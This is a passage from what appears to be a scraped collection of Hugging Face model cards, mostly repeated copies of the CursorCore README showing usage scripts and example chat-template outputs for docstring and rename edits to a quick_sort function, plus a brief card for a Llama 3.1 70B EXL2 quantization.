"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-GPTQ | TechxGenus | 2024-10-10T06:42:00Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:54:07Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
altomek/Llama-3.1-70B-Instruct-5bpw-EXL2 | altomek | 2024-10-10T06:41:56Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"facebook",
"meta",
"pytorch",
"llama-3",
"conversational",
"en",
"de",
"fr",
"it",
"pt",
"hi",
"es",
"th",
"base_model:NousResearch/Meta-Llama-3.1-70B-Instruct",
"base_model:quantized:NousResearch/Meta-Llama-3.1-70B-Instruct",
"license:llama3.1",
"autotrain_compatible",
"text-generation-inference",
"5-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-09T19:22:34Z | ---
language:
- en
- de
- fr
- it
- pt
- hi
- es
- th
library_name: transformers
license: llama3.1
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
inference: false
base_model: NousResearch/Meta-Llama-3.1-70B-Instruct
---
# Meta-Llama-3.1-70B-Instruct
ExLlamav2 5 bpw quant of https://huggingface.co/NousResearch/Meta-Llama-3.1-70B-Instruct
|
TechxGenus/CursorCore-Yi-1.5B-LC | TechxGenus | 2024-10-10T06:41:02Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:01-ai/Yi-Coder-1.5B",
"base_model:finetune:01-ai/Yi-Coder-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T13:40:19Z | ---
tags:
- code
base_model:
- 01-ai/Yi-Coder-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
